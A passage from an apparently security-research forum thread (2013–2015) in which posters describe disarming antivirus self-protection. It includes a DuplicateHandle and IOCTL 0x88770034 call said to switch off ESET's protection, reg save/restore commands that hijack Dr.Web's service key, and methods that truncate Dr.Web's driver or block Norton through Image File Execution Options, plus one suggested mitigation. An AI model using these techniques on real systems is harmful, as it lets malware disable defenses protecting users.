A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about user-mode development.
 #19815  by 0x16/7ton
 Wed Jun 26, 2013 2:05 am
Note about Eset SP bypassing,found it in leaked super elite CrapBerp source pack :ugeek:
So,NOD allow to open own processes with this access:
After opening process {ekrn.exe} they start enuming them handles and duplicate like here:
DuplicateHandle(ekrn_handle_process, (HANDLE)handleInfo->Handles[dwIdx].Handle, NtCurrentProcess(), &hObject, DUPLICATE_SAME_ACCESS, FALSE, DUPLICATE_SAME_ACCESS)
All duplicated handles transmitt to function NtDeviceIoControlFile with IOCTL 0x88770034:
Code: Select all
UCHAR Buff[0x4] = {0x01, 0x00, 0x00, 0x00};
NtDeviceIoControlFile(hObject, NULL, NULL, NULL, &StatusBlock, 0x88770034, Buff, sizeof(Buff), Buff, sizeof(Buff));
Okay in case when duplicated hObject == \Device\Eamon
function NtDeviceIoControlFile call fastIoDispatch->FastIoDeviceControl of eamon.sys driver.
Seems like that IOCTL 0x88770034 just disable av SP.
 #19831  by Alex
 Wed Jun 26, 2013 4:23 pm
I was using the same method to exploit an old ESET's vulnerability. So, ESET still doesn't protect access to its devices. I've never checked functionalities of available IOCTLs, but this is not first and not last time when such easy scenario can be used to disarm AVs. Other AVs should also provide similar functionalities - especially if their GUIs are not protected... An old presentation (ESET once again) - Disabling Antivirus program(s).
 #22137  by 0x16/7ton
 Tue Feb 04, 2014 4:27 pm
I decided to make the video :"how I pwn KGBav with new HIPS system"(DrWeb 9.0) with 100% stealth,without any popup windows,security alerts and etc..

What i have:
-full admin rights
-all work in user mode
-AV settings is paranoidal

Video of this tragedy:

I recommend wipe this crap from your PC,if you still believe in super elite AV protection.
SpiDie will never die :lol:
 #22311  by KiFastCallEntry
 Wed Feb 26, 2014 2:10 pm
nice work 0x16/7ton, some lock tricks you discovered are not working anymore, I just get pissed off when I don't know how they protected from the tricks, some AVs do not use any kind of FS driver filter, so I dont really get how they do it
 #22405  by R00tKit
 Mon Mar 10, 2014 9:09 am

i find 2 ( one share now ) new vulnerability in Dr.Web Self Protection :

1) remove Reg key's :
Code: Select all
reg save HKLM\SYSTEM\CurrentControlSet\serviceMPTRAP  hive.hiv
reg restore HKLM\SYSTEM\CurrentControlSet\services\SpiderG3 hive.hiv
with this we can replace fake key with Dr.web key and Dr.Web will protect our service key :D
after replace SpiderG3 with serviceMPTRAP :D
other VA not tested ( kaspresky is safe : )

edit: solution

filter this is (RegistryCallback)
Vista SP2+ RegNtPreRestoreKey,RegNtPreSaveKey,RegNtPreReplaceKey,
and use SSDT in Vista SP2-- ( 32bit)
You do not have the required permissions to view the files attached to this post.
 #22410  by R00tKit
 Mon Mar 10, 2014 3:32 pm
second method is get sys file ID is dr.web in drivers path and open file with file ID with OPEN_EXISTING + TRUNCATE_EXISTING
after this sys file will truncate after reboot no AV :D :mrgreen:

for Norton 2014 i find this also -> set image File execution option for NIS.exe -> after reboot no AV :D :mrgreen:

so simple need POC ?
 #27131  by cuttingedge
 Tue Nov 03, 2015 12:59 am
Could someone make a mirror of all the dead sendspace.com links on this thread back from 2012? There was some great shares but they did not upload them to kernalmode. Maybe someone has them archived?

Thank you!
 #27134  by EP_X0FF
 Tue Nov 03, 2015 5:04 am
Most of these links were video files. Which one exactly you want?
  • 1
  • 9
  • 10
  • 11
  • 12
  • 13